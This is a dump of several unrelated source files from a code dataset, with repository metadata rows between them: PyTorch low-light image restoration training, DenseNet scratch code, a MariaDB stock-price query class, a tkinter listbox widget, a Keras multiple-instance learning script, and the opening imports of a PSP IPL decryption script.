        gradient_term = pt_grad_loss(output_r, input_high_r)
        # Perceptual (structural similarity) term.
        ssim_term = pt_ssim_loss(output_r, input_high_r)
        return squared_term + gradient_term + ssim_term
def load_images(im):
    """Scale an 8-bit image to [0, 1] and min-max stretch its contrast.

    The 0.001 floor on the value range avoids a division by zero when the
    image is completely flat (such an image maps to all zeros).
    """
    scaled = np.array(im, dtype="float32") / 255.0
    lo = np.min(scaled)
    hi = np.max(scaled)
    value_range = np.maximum(hi - lo, 0.001)
    return np.float32((scaled - lo) / value_range)
def data_augmentation(image, mode):
    """Apply one of eight dihedral transforms to an image.

    mode // 2 gives the number of counter-clockwise 90-degree rotations and
    an odd mode adds an up/down flip, reproducing the original 0-7 table:
    0 identity, 1 flip, 2 rot90, 3 rot90+flip, 4 rot180, 5 rot180+flip,
    6 rot270, 7 rot270+flip.  Any other mode yields None (as before).
    """
    if mode not in (0, 1, 2, 3, 4, 5, 6, 7):
        return None  # unknown mode: same as falling off the original chain
    rotated = np.rot90(image, k=mode // 2) if mode >= 2 else image
    if mode % 2 == 1:
        return np.flipud(rotated)
    return rotated
def read_directory(directory_name):
    """Load every image in a directory (sorted by filename) as a float array.

    Sorting is essential: the low-light and normal-light folders are read
    separately and paired up by list position, and ``os.listdir`` returns
    files in arbitrary filesystem order, so without sorting the pairs could
    be misaligned.

    Returns:
        List of float32 arrays produced by load_images().
    """
    array_of_img = []
    for filename in sorted(os.listdir(directory_name)):
        img = cv2.imread(os.path.join(directory_name, filename))
        img = load_images(img)
        array_of_img.append(img)
    return array_of_img
class adjustdataset(Dataset):
    """Random-crop + dihedral-augmentation dataset over decomposed triples.

    Each item pairs a low-light reflectance crop, the matching low-light
    illumination crop and the matching normal-light reflectance crop, all
    moved to the GPU.
    NOTE(review): relies on the module-global ``patch_size`` and assumes
    every image is at least patch_size x patch_size in both dimensions.
    """
    def __init__(self, low_i, low_r, h_r):
        # Parallel arrays: low illumination, low reflectance, high reflectance.
        self.low_i = low_i
        self.low_r = low_r
        self.h_r = h_r
        self.len = len(h_r)
    def __getitem__(self, index):
        h = self.low_i[index].shape[0]
        w = self.low_i[index].shape[1]
        # Draw ONE crop window and ONE augmentation mode, shared by all
        # three maps so they stay spatially aligned.
        x = random.randint(0, h - patch_size)
        y = random.randint(0, w - patch_size)
        rand_mode = random.randint(0, 7)
        start = time.time()
        l_i = data_augmentation(
            self.low_i[index][x: x + patch_size, y: y + patch_size, :], rand_mode)
        l_r = data_augmentation(
            self.low_r[index][x: x + patch_size, y: y + patch_size, :], rand_mode)
        hh_r = data_augmentation(
            self.h_r[index][x: x + patch_size, y: y + patch_size, :], rand_mode)
        end = time.time()
        start = time.time()
        # .copy() presumably materialises the rotated/flipped numpy views
        # before tensor conversion -- TODO confirm it is still required.
        l_i = l_i.copy()
        l_r = l_r.copy()
        hh_r = hh_r.copy()
        l_r = torch.tensor(l_r).cuda()
        l_i = torch.tensor(l_i).cuda()
        hh_r = torch.tensor(hh_r).cuda()
        end = time.time()
        print('copy cuda time',end - start) # debug timing (~0.005-0.03s observed)
        return l_r, l_i, hh_r
    def __len__(self):
        return self.len
class DealDataset(Dataset):
    """Dataset of paired (low-light, normal-light) full-size images.

    All images are loaded eagerly from disk at construction time;
    __getitem__ simply returns the aligned pair.  Random cropping and
    augmentation happen downstream (see adjustdataset), so the dead crop
    computation the original did per access has been removed -- it also
    consumed two random numbers per item for nothing, perturbing the
    global RNG stream.
    """

    def __init__(self,
                 low_dir='/home/intern2/jay/project/pt_kind/dataset/our485/low',
                 high_dir='/home/intern2/jay/project/pt_kind/dataset/our485/high'):
        """Load every image pair.

        Args:
            low_dir: directory of low-light inputs (default: original path).
            high_dir: directory of normal-light references.
        """
        start = time.time()
        # read_directory normalises each image to float32 in [0, 1].
        self.low_img = read_directory(low_dir)
        self.high_img = read_directory(high_dir)
        end = time.time()
        print('load img time :', end - start)
        self.len = len(self.low_img)

    def __getitem__(self, index):
        # Return the aligned (low, high) pair; no cropping here.
        return self.low_img[index], self.high_img[index]

    def __len__(self):
        return self.len
# loss
class decom_loss(nn.Module):
    """KinD decomposition loss.

    Combines reconstruction fidelity (R * I must rebuild the input),
    reflectance similarity across exposures, and illumination mutual /
    smoothness terms.  The weighted sum and its evaluation order are kept
    exactly as in the original implementation.
    """

    def __init__(self):
        super(decom_loss, self).__init__()

    def forward(self, input_low, input_high, R_low, I_low, R_high, I_high):
        """Compute the scalar decomposition loss.

        Args:
            input_low / input_high: original low/normal-light images (NCHW).
            R_low / R_high: predicted reflectance maps (3 channels).
            I_low / I_high: predicted illumination maps (1 channel).
        """
        # Broadcast the 1-channel illumination maps to 3 channels so they
        # can multiply the RGB reflectance.
        I_low_3 = torch.cat([I_low, I_low, I_low], axis=1)
        I_high_3 = torch.cat([I_high, I_high, I_high], axis=1)
        # Reconstruction: R * I should equal the corresponding input image.
        recon_loss_low = torch.mean(torch.abs(R_low * I_low_3 - input_low))
        recon_loss_high = torch.mean(torch.abs(R_high * I_high_3 - input_high))
        # Reflectance should be illumination-invariant (shared across pair).
        equal_R_loss = torch.mean(torch.abs(R_low - R_high))
        # Mutual consistency between the two illumination maps.
        i_mutual_loss = mutual_i_loss2(I_low, I_high)
        # Structure-aware smoothness of each illumination map w.r.t. its input.
        i_input_mutual_loss_high = mutual_i_input_loss2(I_high, input_high)
        i_input_mutual_loss_low = mutual_i_input_loss2(I_low, input_low)
        # Term weights.  Note the deliberate asymmetry kept from the original
        # code: the high-exposure smoothness term uses 0.02, the low one 0.15.
        t1 = torch.tensor([1]).cuda()
        t2 = torch.tensor([0.01]).cuda()
        t3 = torch.tensor([0.2]).cuda()
        t4 = torch.tensor([0.02]).cuda()
        t5 = torch.tensor([0.15]).cuda()
        loss_Decom = (torch.mul(recon_loss_high, t1)
                      + torch.mul(recon_loss_low, t1)
                      + torch.mul(equal_R_loss, t2)
                      + torch.mul(i_mutual_loss, t3)
                      + torch.mul(i_input_mutual_loss_high, t4)
                      + torch.mul(i_input_mutual_loss_low, t5))
        return loss_Decom
# low_img=read_directory('/home/intern2/jay/project/pt_kind/dataset/our485/low')
# high_img = read_directory('/home/intern2/jay/project/pt_kind/dataset/our485/high')
# low_img = torch.tensor(low_img[0:100,:,:,:]).cuda()
# high_img = torch.tensor(high_img).cuda()
def save_images(filepath, result_1, result_2=None, result_3=None):
    """Write up to three images side by side as one file via cv2.

    Each result is a torch tensor with values in [0, 1]; tensors are
    detached, squeezed to HxWxC and concatenated along the width axis
    before being scaled to 8-bit range.

    Fixes two defects of the original: calling with the default
    result_2=None crashed on ``None.cpu()``, and result_3 was silently
    ignored even when provided.
    """
    def _to_array(tensor):
        # Purpose: tensor -> plain HxWxC numpy array on the CPU.
        return np.squeeze(tensor.cpu().detach().numpy())

    cat_image = _to_array(result_1)
    if result_2 is not None:
        cat_image = np.concatenate([cat_image, _to_array(result_2)], axis=1)
    if result_3 is not None:
        cat_image = np.concatenate([cat_image, _to_array(result_3)], axis=1)
    cv2.imwrite(filepath, cat_image * 255.0)
    print(filepath)
if __name__ == "__main__":
    # Training driver for the restoration net: (1) run a frozen DecomNet over
    # all 485 training pairs to pre-compute reflectance/illumination maps,
    # (2) train RestorationNet on random crops of those maps, periodically
    # saving an evaluation image and finally a checkpoint.
    os.environ["CUDA_VISIBLE_DEVICES"] = "0"
    start_epoch = 0
    epoch = 9999999
    everyepoch = 3000
    start_step = 0
    numBatch = 1 # unused; leftover from an earlier batch-size-10 setup
    batch_size = 4
    decim_batch_size = 1
    adj_batch_size = 485
    patch_size = 384
    learning_rate = 0.0001
    sample_dir = './eval_restore/1'
    model_decom_CKPT_PATH = './check/MyNet_2000_best.pkl'
    sample_decom_dir = './result/decom_eval'
    # Pre-trained decomposition weights (saved under 'state_dict').
    checkpoints = torch.load(model_decom_CKPT_PATH)
    checkpoint = checkpoints['state_dict']
    decomposed_low_r_data_480 = []
    decomposed_low_i_data_480 = []
    decomposed_high_r_data_480 = []
    R_low = []
    R_high = []
    I_low_3 = []
    I_high_3 = []
    output_R_low = R_low
    output_R_high = R_high
    output_I_low = I_low_3
    output_I_high = I_high_3
    model_restore = RestorationNet()
    model_restore = nn.DataParallel(model_restore).cuda()
    optimizer = optim.Adam(model_restore.parameters(), lr=learning_rate)
    # Full-image pairs, one at a time, for the decomposition pass.
    dealDataset = DealDataset()
    train_loader = DataLoader(dataset=dealDataset,
                              batch_size=decim_batch_size,
                              shuffle=True)
    eval_imgs = read_directory('/home/intern2/jay/project/pt_kind/dataset/eval15/low')
    eval_img = load_images(cv2.imread('/home/intern2/jay/project/pt_kind/dataset/eval15/low/1.png'))
    # Frozen decomposition model.
    model_decom = DecomNet()
    model_decom = nn.DataParallel(model_decom).cuda()
    model_decom.load_state_dict(checkpoint)
    model_decom.eval()
    # Pass every training pair through DecomNet once; collect numpy HWC maps.
    for i, data in enumerate(train_loader):
        print('i :', i)
        train_low, train_high = data
        train_low = train_low.permute([0, 3, 1, 2]).cuda()
        train_high = train_high.permute([0, 3, 1, 2]).cuda()
        R_low, I_low = model_decom(train_low)
        R_high, I_high = model_decom(train_high)
        # Gamma-adjust the reference reflectance (presumably to brighten the
        # training target -- TODO confirm against the KinD recipe).
        R_high = torch.pow(R_high, 1.2)
        I_low = I_low.permute([0, 2, 3, 1]).squeeze(0).cpu().detach().numpy()
        R_low = R_low.permute([0, 2, 3, 1]).squeeze(0).cpu().detach().numpy()
        R_high = R_high.permute([0, 2, 3, 1]).squeeze(0).cpu().detach().numpy()
        decomposed_low_i_data_480.append(I_low)
        decomposed_low_r_data_480.append(R_low)
        decomposed_high_r_data_480.append(R_high)
    decomposed_low_i_data_480 = np.array(decomposed_low_i_data_480)
    decomposed_low_r_data_480 = np.array(decomposed_low_r_data_480)
    decomposed_high_r_data_480 = np.array(decomposed_high_r_data_480)
    # Crop/augment dataset over the decomposed maps; one big GPU batch of 485
    # items per loader step, sub-batched manually below.
    adjDataset = adjustdataset(decomposed_low_i_data_480, decomposed_low_r_data_480, decomposed_high_r_data_480)
    train_loader = DataLoader(dataset=adjDataset,
                              batch_size=adj_batch_size,
                              shuffle=True)
    reloss = restore_loss().cuda()
    start = time.time()
    for epo in range(epoch):
        model_restore.train()
        print('epoch :', epo)
        # Step-wise learning-rate schedule.
        initial_lr = learning_rate
        if epo<=800:
            lr = initial_lr
        elif epo<=1250:
            lr = initial_lr/2
        elif epo<=1500:
            lr = initial_lr/4
        else:
            lr = initial_lr/10
        optimizer.param_groups[0]['lr'] = lr
        for i, data in enumerate(train_loader):
            train_r, train_i, train_hr = data
            train_r = train_r.permute([0, 3, 1, 2])
            train_i = train_i.permute([0, 3, 1, 2])
            train_hr = train_hr.permute([0, 3, 1, 2])
            # Manual mini-batching of the 485-item loader batch.
            j = train_r.shape[0]
            m = j // batch_size
            # NOTE(review): `m * 10` looks like a leftover from batch_size=10;
            # with batch_size=4 this never adds the final partial batch.
            if (m * 10 < j):
                m = m + 1
            for index in range(m):
                # t = size of this sub-batch (last one may be partial).
                if ((index + 1) * batch_size > train_r.shape[0]):
                    t = (index + 1) * batch_size - j
                else:
                    t = batch_size
                R_low_r = model_restore(train_r[index * batch_size:index * batch_size + t, :, :, :],
                                        train_i[index * batch_size:index * batch_size + t, :, :, :])
                print('R_low shape :',R_low_r.shape)
                loss = reloss(R_low_r,train_hr[index * batch_size:index * batch_size + t, :, :, :])
                optimizer.zero_grad()
                loss.backward()
                optimizer.step()
                print('loss :',loss)
        # Periodic qualitative evaluation on one fixed low-light image.
        if ((epo + 1) % everyepoch == 0):
            img = np.array(eval_img)
            img = torch.FloatTensor(img)
            img = img.unsqueeze(0)
            img = img.permute([0, 3, 1, 2]).cuda()
            print('shape 2',img.shape)
            dr,di = model_decom(img)
            print('dr ',dr.shape)
            print('di ',di.shape)
            # NOTE(review): this restores the LAST TRAINING sub-batch, not the
            # eval image's (dr, di) -- presumably unintended; verify.
            R_high = model_restore(train_r[index * batch_size:index * batch_size + t, :, :, :],train_i[index * batch_size:index * batch_size + t, :, :, :])
            print('r_high ',R_high.shape)
            R_high = R_high.permute([0, 2, 3, 1])
            dr = dr.permute([0, 2, 3, 1])
            print('dr shape',dr.shape)
            print('R_high',R_high.shape)
            save_images(os.path.join(sample_dir, 'low_%d.png' % (epo)), dr,R_high)
    end = time.time()
    print('time :',end -start)
    # Only reached after the (practically endless) epoch loop finishes.
    torch.save({'state_dict': model_restore.state_dict(), 'epoch': epoch}, 'MyNet_retore' + str(epoch) + '_best.pkl')
    print('Save best statistics done!')
| [
"958086580@qq.com"
] | 958086580@qq.com |
3675c81fa64f643435af8af8959c0960e81f4429 | a5592f706bf25484843eaa466f86ea3214a46ea2 | /practice.py | 9db1a194f636bfcc1afc0452c6be57614f92fc4c | [] | no_license | BOBKINGS1101/Practice | e54f6043bb110f2db962a80849a2a8c2ac5e24f9 | 86ced13a119bd612b5b3250bc6604b1031b860a7 | refs/heads/master | 2020-08-08T13:11:21.887998 | 2019-10-09T06:47:35 | 2019-10-09T06:47:35 | 213,838,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,528 | py | import re
import torch as t
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.checkpoint as cp
from collections import OrderedDict
import numpy as np
class ClassName(object):
    """Placeholder boilerplate class: stores its single constructor argument as ``.arg``."""
    def __init__(self, arg):
        super(ClassName, self).__init__()
        self.arg = arg
class _DenseLayer(nn.Sequential):
def __init__(self, num_input_features, growth_rate, bn_size, drop_rate, memory_efficient=False):
super(_DenseLayer, self).__init__()
self.add_module('norm1', nn.BatchNorm2d(num_input_features)),
self.add_module('relu1', nn.ReLU(inplace=True)),
self.add_module('conv1', nn.Conv2d(num_input_features, bn_size *
growth_rate, kernel_size=1, stride=1,
bias=False)),
self.add_module('norm2', nn.BatchNorm2d(bn_size * growth_rate)),
self.add_module('relu2', nn.ReLU(inplace=True)),
self.add_module('conv2', nn.Conv2d(bn_size * growth_rate, growth_rate,
kernel_size=3, stride=1, padding=1,
bias=False)),
self.drop_rate = drop_rate
self.memory_efficient = memory_efficient
def forward(self, *prev_features):
bn_function = _bn_function_factory(self.norm1, self.relu1, self.conv1)
if self.memory_efficient and any(prev_feature.requires_grad for prev_feature in prev_features):
bottleneck_output = cp.checkpoint(bn_function, *prev_features)
else:
bottleneck_output = bn_function(*prev_features)
new_features = self.conv2(self.relu2(self.norm2(bottleneck_output)))
if self.drop_rate > 0:
new_features = F.dropout(new_features, p=self.drop_rate,
training=self.training)
return new_features
class _DenseBlock(nn.Module):
    """Stack of _DenseLayer modules with dense (concatenating) connectivity.

    Each layer consumes every earlier feature map and contributes
    ``growth_rate`` new channels; the block's output concatenates all of
    them, giving num_input_features + num_layers * growth_rate channels.
    """

    def __init__(self, num_layers, num_input_features, bn_size, growth_rate, drop_rate, memory_efficient=False):
        super(_DenseBlock, self).__init__()
        for i in range(num_layers):
            layer = _DenseLayer(
                num_input_features + i * growth_rate,
                growth_rate=growth_rate,
                bn_size=bn_size,
                drop_rate=drop_rate,
                memory_efficient=memory_efficient,
            )
            self.add_module('denselayer%d' % (i + 1), layer)

    def forward(self, init_features):
        features = [init_features]
        for name, layer in self.named_children():
            new_features = layer(*features)
            features.append(new_features)
        # Fix: the file imports torch as `t`, so the original `torch.cat`
        # raised NameError at runtime.
        return t.cat(features, 1)
#model=_DenseBlock(3,5,5,2,0.5)
#for name,module in model.named_children():
# print(module)
#x=np.array([[[1,1,1],[2,2,2]]])
#print(x.shape[0])
#print(x.shape)
#print(x[:,0])
#print(x[:,1])
#a=t.Tensor([[1,2,3,4,5,6,7,8],[1,2,3,4,5,6,7,8]])
#b=a.reshape(-1)
#print(a)
#print(b)
#size=np.array([1,2,3])
#aspect_ratios=np.array([1,0.5,2])
#for s,a in zip(size,aspect_ratios):
# print('s:{0:.3f}'.format(s))
# print('a:{0:.3f}'.format(a))
# Scratch demo: collect per-feature-map anchor rows into a per-image list
# (torchvision AnchorGenerator-style nesting with a single image).
anchors_over_all_feature_maps=np.array([[0,3,3,4,4],[1,1,1,2,2,],[2,5,5,6,6],[3,7,7,8,8]])
anchors=[]
for i in range(0,1): # one image in the "image list"
    anchor_in_image=[]
    for anchors_per_feature_map in anchors_over_all_feature_maps:
        anchor_in_image.append(anchors_per_feature_map)
    anchors.append(anchor_in_image)
print(anchors)
# NOTE(review): this comprehension ignores `anchors_per_image` and reuses the
# loop variable leaked from the for-loop above, so every element becomes the
# LAST feature map's row -- presumably `anchors_per_image` (or a cat of it)
# was intended; verify against the torchvision original.
anchors=[(anchors_per_feature_map) for anchors_per_image in anchors]
print(anchors)
print(anchors) | [
"844311505@qq.com"
] | 844311505@qq.com |
9e51c268e2e7071f710e2cada3da0c3dd7aadc10 | b3967ca7c0590014a8b7659f6d505e61d22e8322 | /5.시세DB구축 및 시세 조회API 개발/Analyzer.py | 3014c257949017d306ac53b866fd1141382ddef9 | [] | no_license | est22/FDA | abfa7a8891a5d603eed2762cc947056d9a8ea08d | 6fa69fa8052a57725cf33ec07d17f7251db7393f | refs/heads/main | 2023-02-26T13:26:55.415634 | 2021-01-31T17:51:06 | 2021-01-31T17:51:06 | 328,329,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,746 | py | import pandas as pd
import pymysql
from datetime import datetime
from datetime import timedelta
import re
class MarketDB:
    """Query helper over the local 'Stock' MariaDB (company info + daily prices)."""

    def __init__(self):
        """Connect to MariaDB and build the stock-code dictionary."""
        self.conn = pymysql.connect(host='localhost', user='root',
                                    password='', db='Stock', charset='utf8')
        self.codes = {}
        self.get_comp_info()

    def __del__(self):
        """Close the MariaDB connection when the object is collected."""
        self.conn.close()

    def get_comp_info(self):
        """Populate self.codes with {stock_code: company_name} from company_info."""
        sql = "SELECT * FROM company_info"
        krx = pd.read_sql(sql, self.conn)
        for code, company in zip(krx['code'], krx['company']):
            self.codes[code] = company

    @staticmethod
    def _normalize_date(date_str, label):
        """Parse a loosely delimited date string into 'YYYY-MM-DD'.

        Any non-digit run is accepted as a separator ('2020/1/5', '2020-01-05',
        ...).  ``label`` is 'start' or 'end' and is only used in messages.
        Returns None (after printing the same message the original printed)
        when a component is out of range: year 1900-2200, month 1-12,
        day 1-31.  (The original end-date check used 1800 as the lower
        year bound, inconsistently with the start-date check; both now
        use 1900.)
        """
        parts = re.split(r'\D+', date_str)
        if parts[0] == '':
            parts = parts[1:]
        year, month, day = int(parts[0]), int(parts[1]), int(parts[2])
        if year < 1900 or year > 2200:
            print(f"ValueError: {label}_year({year:d}) is wrong.")
            return None
        if month < 1 or month > 12:
            print(f"ValueError: {label}_month({month:d}) is wrong.")
            return None
        if day < 1 or day > 31:
            print(f"ValueError: {label}_day({day:d}) is wrong.")
            return None
        return f"{year:04d}-{month:02d}-{day:02d}"

    def get_daily_price(self, code, start_date=None, end_date=None):
        """Return daily price rows for one KRX stock as a DataFrame.

        Args:
            code: KRX stock code ('005930') or company name ('삼성전자').
            start_date: first day to include; defaults to one year ago.
            end_date: last day to include; defaults to today.

        Returns:
            DataFrame indexed by date, or None when a date is invalid or the
            code/company is unknown (fix: the original printed the
            "doesn't exist" message but still ran the query).
        """
        if start_date is None:
            one_year_ago = datetime.today() - timedelta(days=365)
            start_date = one_year_ago.strftime('%Y-%m-%d')
            print("start_date is initialized to '{}'".format(start_date))
        else:
            start_date = self._normalize_date(start_date, 'start')
            if start_date is None:
                return None
        if end_date is None:
            end_date = datetime.today().strftime('%Y-%m-%d')
            print("end_date is initialized to '{}'".format(end_date))
        else:
            end_date = self._normalize_date(end_date, 'end')
            if end_date is None:
                return None
        # Accept either a stock code or a company name (reverse lookup keeps
        # the first match, as the original list-based search did).
        if code not in self.codes:
            reverse_hit = None
            for stock_code, name in self.codes.items():
                if name == code:
                    reverse_hit = stock_code
                    break
            if reverse_hit is None:
                print(f"ValueError: Code({code}) doesn't exist.")
                return None
            code = reverse_hit
        # Values are validated/normalised above; parameterised queries would
        # still be preferable to string interpolation.
        sql = f"SELECT * FROM daily_price WHERE code = '{code}'"\
              f" and date >= '{start_date}' and date <= '{end_date}'"
        df = pd.read_sql(sql, self.conn)
        df.index = df['date']
        return df
| [
"noreply@github.com"
] | est22.noreply@github.com |
4345f43ceebfae6bf9b4514241a243202d936d70 | 6d71de4e88dcb7d04f6d3a18736d393e12f8d087 | /scripts/packages/mylistbox.py | 27d62cd97b87fe9edbbcf35263ca9292f8eac3c9 | [
"MIT"
] | permissive | wyolum/Alex | 71075c30691229e8eb28afa06a6ab44c450b14d4 | 03f1d8ae0107454d18964e33777ffc4c0c1a1951 | refs/heads/main | 2023-07-02T16:11:57.088323 | 2021-08-05T17:59:04 | 2021-08-05T17:59:04 | 338,686,528 | 10 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,551 | py | #https://tk-tutorial.readthedocs.io/en/latest/listbox/listbox.html
import tkinter as tk
def listbox(parent, items, item_clicked, item_selected, n_row=40):
    """Build a searchable Listbox widget wrapped in a Frame.

    Args:
        parent: containing tk widget.
        items: sequence of strings shown in the listbox.
        item_clicked: callback(str) fired on single click / selection change.
        item_selected: callback(str) fired on double click.
        n_row: number of visible rows.

    Returns:
        The Frame; the listbox's get/insert/delete/index methods are
        re-exported as attributes on the frame for convenience.
    """
    def myclick(event=None):
        # Copy the clicked entry into the search box, then notify the caller.
        idx = lb.curselection()
        if idx:
            out = lb.get(idx)
            search.delete(0, tk.END)
            search.insert(0, out)
            item_clicked(out)
    def myselect(event):
        # Double click: behave like a click, then fire the select callback.
        myclick(event)
        idx = lb.curselection()
        out = lb.get(idx)
        item_selected(out)
    def search_changed(*args):
        # Re-fill the listbox with items containing the search text
        # (case-insensitive).  NOTE(review): the trace wiring below is
        # commented out, so this handler is currently never invoked.
        search_str = search_var.get()
        i = 0
        lb.delete(0, tk.END)
        for item in items:
            if search_str.lower() in item.lower():
                lb.insert(i, item)
                i += 1
    frame = tk.Frame(parent)
    search_var = tk.StringVar()
    #search_var.trace('w', search_changed)
    search = tk.Entry(frame, width=40, textvariable=search_var)
    search.grid(row=1, column=0)
    var = tk.StringVar(value=items)
    lb = tk.Listbox(frame, listvariable=var, selectmode='single', height=n_row, width=40)
    lb.grid(row=2, column=0)
    lb.bind('<<ListboxSelect>>', myclick)
    lb.bind('<Double-Button-1>', myselect)
    # Re-export a few listbox methods on the returned frame.
    frame.get = lb.get
    frame.insert = lb.insert
    frame.delete = lb.delete
    frame.index = lb.index
    return frame
def click(*args):
    # Demo callback: log single-click selections from the listbox.
    print('click', args)
def select(*args):
    # Demo callback: log double-click selections from the listbox.
    print('select', args)
if __name__ == '__main__':
    # Manual smoke test: browse tkinter's attribute names in the widget.
    root = tk.Tk()
    frame = listbox(root, dir(tk), click, select)
    frame.grid()
    root.mainloop()
| [
"wyojustin@gmail.com"
] | wyojustin@gmail.com |
ce65e1e932a3e2ddcb25657bc25a563aa6027622 | 5225e78b02c661d1ff7fdd873ded60eda394811f | /generator/__init__.py | e447551f789a8f641820315294498da5b3e2cad4 | [] | no_license | sn0wf1llin/tcap | 1d3676b8e225c68c9b96c14c0c3801b0ff7dc835 | 93af911f3e0652961a25b2b992f943f6acf59b2a | refs/heads/master | 2021-01-24T10:30:06.260318 | 2016-12-02T10:18:23 | 2016-12-02T10:18:23 | 69,731,085 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 74 | py | __author__ = 'MA573RWARR10R'
import digits_voc_
import traindata_generator | [
"MA573RWARR10R@h3llca7.local"
] | MA573RWARR10R@h3llca7.local |
dc0957d43234dbfb017b836dc15558c38e372156 | 27ad60a591ccedeb7babd16e5ef11dc9d555cc52 | /MI_Net.py | 01b172e2ca553fb32b4b29561ba5ea1b27dbe1f5 | [] | no_license | kilakila-heart/MINNs | 6cfc305c726d05f8068b103f4f2d6772811e512a | 9e1ad121fc0f2396a4f8edcc2f6e12f9ec08f466 | refs/heads/master | 2021-06-24T00:08:34.558901 | 2017-09-07T06:51:09 | 2017-09-07T06:51:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,106 | py | import numpy as np
import sys
import time
import random
from random import shuffle
import argparse
from keras.models import Model
from keras.optimizers import SGD
from keras.regularizers import l2
from keras.layers import Input, Dense, Layer, Dropout
from mil_nets.dataset import load_dataset
from mil_nets.layer import Feature_pooling
from mil_nets.metrics import bag_accuracy
from mil_nets.objectives import bag_loss
from mil_nets.utils import convertToBatch
def parse_args():
    """Parse the command-line hyper-parameters for the MI-Net script.

    When the script is launched with no arguments at all, the usage text is
    printed and the process exits with status 1.

    Returns:
        argparse.Namespace holding the experimental hyper-parameters.
    """
    parser = argparse.ArgumentParser(description='Train a MI-Net')
    # (flag, dest, help, default, type) for every supported option.
    option_specs = [
        ('--dataset', 'dataset', 'dataset to train on, like musk1 or fox', None, str),
        ('--pooling', 'pooling_mode', 'mode of MIL pooling', 'max', str),
        ('--lr', 'init_lr', 'initial learning rate', 5e-4, float),
        ('--decay', 'weight_decay', 'weight decay', 0.005, float),
        ('--momentum', 'momentum', 'momentum', 0.9, float),
        ('--epoch', 'max_epoch', 'number of epoch to train', 50, int),
    ]
    for flag, dest, help_text, default, value_type in option_specs:
        parser.add_argument(flag, dest=dest, help=help_text,
                            default=default, type=value_type)
    # Bare invocation: show usage instead of silently training with defaults.
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)
    return parser.parse_args()
def test_eval(model, test_set):
"""Evaluate on testing set.
Parameters
-----------------
model : keras.engine.training.Model object
The training MI-Net model.
test_set : list
A list of testing set contains all training bags features and labels.
Returns
-----------------
test_loss : float
Mean loss of evaluating on testing set.
test_acc : float
Mean accuracy of evaluating on testing set.
"""
num_test_batch = len(test_set)
test_loss = np.zeros((num_test_batch, 1), dtype=float)
test_acc = np.zeros((num_test_batch, 1), dtype=float)
for ibatch, batch in enumerate(test_set):
result = model.test_on_batch({'input':batch[0]}, {'fp':batch[1]})
test_loss[ibatch] = result[0]
test_acc[ibatch][0] = result[1]
return np.mean(test_loss), np.mean(test_acc)
def train_eval(model, train_set):
    """Run one training pass over the (shuffled) training bags.

    Args:
        model: compiled Keras model exposing ``train_on_batch``.
        train_set: list of (bag_features, bag_label) batches; shuffled
            in place so each epoch sees a new bag order.

    Returns:
        Tuple (mean loss, mean accuracy) across all training bags.
    """
    shuffle(train_set)
    losses = []
    accuracies = []
    for batch in train_set:
        result = model.train_on_batch({'input': batch[0]}, {'fp': batch[1]})
        losses.append(result[0])
        accuracies.append(result[1])
    return np.mean(losses), np.mean(accuracies)
def MI_Net(dataset):
    """Train and evaluate on MI-Net.
    Parameters
    -----------------
    dataset : dict
        A dictionary contains all dataset information. We split train/test by keys.
    Returns
    -----------------
    test_acc : float
        Testing accuracy of MI-Net (from the final epoch; no early stopping).
    """
    # load data and convert type
    train_bags = dataset['train']
    test_bags = dataset['test']
    # convert bag to batch
    train_set = convertToBatch(train_bags)
    test_set = convertToBatch(test_bags)
    dimension = train_set[0][0].shape[1]
    # data: instance feature, n*d, n = number of training instance
    data_input = Input(shape=(dimension,), dtype='float32', name='input')
    # fully-connected tower 256 -> 128 -> 64 with L2 weight decay
    fc1 = Dense(256, activation='relu', W_regularizer=l2(args.weight_decay))(data_input)
    fc2 = Dense(128, activation='relu', W_regularizer=l2(args.weight_decay))(fc1)
    fc3 = Dense(64, activation='relu', W_regularizer=l2(args.weight_decay))(fc2)
    # dropout
    dropout = Dropout(p=0.5)(fc3)
    # MIL pooling over instance features -> one bag-level score
    fp = Feature_pooling(output_dim=1, W_regularizer=l2(args.weight_decay), pooling_mode=args.pooling_mode, name='fp')(dropout)
    model = Model(input=[data_input], output=[fp])
    sgd = SGD(lr=args.init_lr, decay=1e-4, momentum=args.momentum, nesterov=True)
    model.compile(loss=bag_loss, optimizer=sgd, metrics=[bag_accuracy])
    # train model (relies on the module-global `args` from parse_args)
    t1 = time.time()
    num_batch = len(train_set)  # NOTE(review): currently unused
    for epoch in range(args.max_epoch):
        train_loss, train_acc = train_eval(model, train_set)
        test_loss, test_acc = test_eval(model, test_set)
        print 'epoch=', epoch, ' train_loss= {:.3f}'.format(train_loss), ' train_acc= {:.3f}'.format(train_acc), ' test_loss={:.3f}'.format(test_loss), ' test_acc= {:.3f}'.format(test_acc)
    t2 = time.time()
    print 'run time:', (t2-t1) / 60, 'min'
    print 'test_acc={:.3f}'.format(test_acc)
    return test_acc
if __name__ == '__main__':
    # Entry point: repeat 10-fold cross-validation five times and report
    # the mean/std test accuracy.  (Python 2 syntax throughout.)
    args = parse_args()
    print 'Called with args:'
    print args
    # perform five times 10-fold cross-validation experiments
    run = 5
    n_folds = 10
    acc = np.zeros((run, n_folds), dtype=float)
    for irun in range(run):
        dataset = load_dataset(args.dataset, n_folds)
        for ifold in range(n_folds):
            print 'run=', irun, ' fold=', ifold
            # NOTE(review): indexes dataset[irun] for every fold -- presumably
            # dataset[ifold] was intended; verify against load_dataset's layout.
            acc[irun][ifold] = MI_Net(dataset[irun])
    print 'MI-Net mean accuracy = ', np.mean(acc)
    print 'std = ', np.std(acc)
| [
"624993525@qq.com"
] | 624993525@qq.com |
aaf496d7464998178eef745a50663c6a58a5db80 | d9125031f498665a621fd71f0078c0400f782a6b | /decrypt_ipl.py | 42be36a33f3388d33342feea690c006ef3a47558 | [
"MIT"
] | permissive | DaveeFTW/iplsdk | 8076c28249ce733cae00c3920191ee7dbd87bec4 | f07668e4d16965930d5a06c1b8f1664c6bcd2fbf | refs/heads/main | 2023-09-01T15:04:09.205335 | 2023-08-23T22:59:14 | 2023-08-23T22:59:14 | 167,315,667 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 12,603 | py | #!/bin/env python3
import sys
import struct
from Crypto.Cipher import AES
from Crypto.Hash import CMAC, SHA1
